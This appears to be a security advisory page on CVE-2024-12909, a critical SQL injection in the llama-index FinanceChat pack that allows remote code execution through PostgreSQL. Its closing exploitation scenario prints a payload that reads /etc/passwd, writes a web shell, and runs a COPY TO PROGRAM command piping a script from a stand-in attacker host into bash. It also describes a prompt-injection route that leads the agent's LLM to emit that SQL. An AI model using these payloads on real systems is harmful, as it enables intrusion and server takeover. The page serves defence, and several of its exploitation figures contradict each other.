CVE-2024-12909 — CRITICAL (CVSS 10.0)

Q: Is CVE-2024-12909 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-12909, increasing the risk of exploitation.

Q: How to fix CVE-2024-12909?

1. **Remove immediately**: Uninstall `llama-index-packs-finchat` — no patch exists and none will be issued. Pin your `llama-index` packs to avoid automatic reinstallation. 2. **Audit dependent packages**: Run `pip show llama-index-packs-finchat` and audit `requirements.txt`/`pyproject.toml` across all AI services. 3. **PostgreSQL hardening**: Restrict the database user used by any LLM agent to SELECT-only with no SUPERUSER, no CREATEDB, and no `pg_execute_server_program` privilege. Disable `COPY TO PROGRAM` for application roles. 4. **Detection**: Monitor PostgreSQL logs for `lo_create`, `lo_import`, `lo_export`, `COPY TO PROGRAM`, and `pg_largeobject` table access patterns from application service accounts. 5. **Replacement**: Implement any required financial DB query functionality using a parameterized query wrapper with strict input validation before exposing to LLM-generated SQL.

Q: What systems are affected by CVE-2024-12909?

This vulnerability affects the following AI/ML architecture patterns: Agent frameworks, LLM-integrated database tools, Financial analysis AI pipelines, RAG pipelines with SQL backends.

Q: What is the CVSS score for CVE-2024-12909?

CVE-2024-12909 has a CVSS v3.1 base score of 10.0 (CRITICAL). The EPSS exploitation probability is 4.13%.

CISO Take

A critical SQL injection flaw (CVSS 10.0) in the FinanceChatLlamaPack's `database_agent` allows any unauthenticated remote attacker to inject arbitrary SQL and escalate to full remote code execution via PostgreSQL's large object functionality — no credentials, no interaction required. With 227 downstream dependents, 12 prior CVEs in the same package, and an EPSS score placing this in the top 28% for exploitation likelihood, the blast radius across AI-driven financial analysis pipelines is significant. Critically, no patch will ever be released: the maintainers resolved this by abandoning the package to a `stale_packages` branch and removing it from documentation. Immediate action is removal of `llama-index-packs-finchat` from all environments; any deployment retaining this package is fully exposed to unauthenticated RCE against its PostgreSQL backend.

Sources: NVD EPSS GitHub Advisory CISA KEV ATLAS

What is the risk?

Severity is maximum (CVSS 10.0) with the most dangerous attack profile possible: network-accessible, low complexity, no privileges required, no user interaction, full CIA impact with scope change. The lack of any patch and the package's abandonment mean this vulnerability will never be remediated upstream. While EPSS (0.694%) reflects relatively low current active exploitation, the trivial exploitability of SQL injection combined with the PostgreSQL large object RCE path — a well-documented technique (e.g., CVE-2019-9193 precedent) — means exploitation requires minimal attacker sophistication. Organizations running AI financial analysis agents backed by PostgreSQL face the highest exposure.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
llama-index-packs-finchat	pip	<= 0.3.0	No patch
49.5K 229 dependents Pushed 6d ago 87% patched ~50d to patch Full package profile →

Do you use llama-index-packs-finchat? You're affected.

Severity & Risk

CVSS 3.1

10.0 / 10

EPSS

4.1%

chance of exploitation in 30 days

Higher than 89% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR None

UI None

S Changed

C High

I High

A High

What should I do?

5 steps

Remove immediately

Uninstall llama-index-packs-finchat — no patch exists and none will be issued. Pin your llama-index packs to avoid automatic reinstallation.
Audit dependent packages

Run pip show llama-index-packs-finchat and audit requirements.txt/pyproject.toml across all AI services.
PostgreSQL hardening

Restrict the database user used by any LLM agent to SELECT-only with no SUPERUSER, no CREATEDB, and no pg_execute_server_program privilege. Disable COPY TO PROGRAM for application roles.
Detection

Monitor PostgreSQL logs for lo_create, lo_import, lo_export, COPY TO PROGRAM, and pg_largeobject table access patterns from application service accounts.
Replacement

Implement any required financial DB query functionality using a parameterized query wrapper with strict input validation before exposing to LLM-generated SQL.

CISA SSVC Assessment

Decision Attend

Exploitation poc

Automatable Yes

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Supply Chain Data Extraction Agent Framework Plugin AML.T0010.001 - AI Software AML.T0010.005 - AI Agent Tool AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0053 - AI Agent Tool Invocation

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.2.6 - AI system security

NIST AI RMF

MS-2.5 - AI Risk Measurement and Monitoring

OWASP LLM Top 10

LLM07:2025 - Insecure Plugin Design

Frequently Asked Questions

What is CVE-2024-12909?

A critical SQL injection flaw (CVSS 10.0) in the FinanceChatLlamaPack's `database_agent` allows any unauthenticated remote attacker to inject arbitrary SQL and escalate to full remote code execution via PostgreSQL's large object functionality — no credentials, no interaction required. With 227 downstream dependents, 12 prior CVEs in the same package, and an EPSS score placing this in the top 28% for exploitation likelihood, the blast radius across AI-driven financial analysis pipelines is significant. Critically, no patch will ever be released: the maintainers resolved this by abandoning the package to a `stale_packages` branch and removing it from documentation. Immediate action is removal of `llama-index-packs-finchat` from all environments; any deployment retaining this package is fully exposed to unauthenticated RCE against its PostgreSQL backend.

Is CVE-2024-12909 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-12909, increasing the risk of exploitation.

How to fix CVE-2024-12909?

1. **Remove immediately**: Uninstall `llama-index-packs-finchat` — no patch exists and none will be issued. Pin your `llama-index` packs to avoid automatic reinstallation. 2. **Audit dependent packages**: Run `pip show llama-index-packs-finchat` and audit `requirements.txt`/`pyproject.toml` across all AI services. 3. **PostgreSQL hardening**: Restrict the database user used by any LLM agent to SELECT-only with no SUPERUSER, no CREATEDB, and no `pg_execute_server_program` privilege. Disable `COPY TO PROGRAM` for application roles. 4. **Detection**: Monitor PostgreSQL logs for `lo_create`, `lo_import`, `lo_export`, `COPY TO PROGRAM`, and `pg_largeobject` table access patterns from application service accounts. 5. **Replacement**: Implement any required financial DB query functionality using a parameterized query wrapper with strict input validation before exposing to LLM-generated SQL.

What systems are affected by CVE-2024-12909?

This vulnerability affects the following AI/ML architecture patterns: Agent frameworks, LLM-integrated database tools, Financial analysis AI pipelines, RAG pipelines with SQL backends.

What is the CVSS score for CVE-2024-12909?

CVE-2024-12909 has a CVSS v3.1 base score of 10.0 (CRITICAL). The EPSS exploitation probability is 4.13%.

Technical Details

NVD Description

A vulnerability in the FinanceChatLlamaPack of the llama-index-packs-finchat package, versions up to v0.3.0, allows for SQL injection in the `run_sql_query` function of the `database_agent`. This vulnerability can be exploited by an attacker to inject arbitrary SQL queries, leading to remote code execution (RCE) through the use of PostgreSQL's large object functionality. The issue is resolved by no longer officially supporting the package and moving it into the `stale_packages` branch on the repo, this removing it from documentation etc.

Exploitation Scenario

An attacker targeting an AI financial analysis application built on LlamaIndex sends a crafted natural-language query (or, in an agentic pipeline, injects a malicious instruction via prompt injection). The LLM generates and passes a SQL string containing a PostgreSQL large object payload to `run_sql_query`. Example payload: `'; SELECT lo_import('/etc/passwd'); SELECT lo_export(16384, '/var/www/html/shell.php'); --`. If the PostgreSQL user has sufficient privileges, this writes a webshell to the server filesystem. Alternatively, if the role has `SUPERUSER`, the attacker uses `COPY (SELECT 'payload') TO PROGRAM 'curl attacker.com/shell.sh | bash'` to achieve direct OS command execution. The entire attack chain is unauthenticated and requires no prior knowledge of the schema.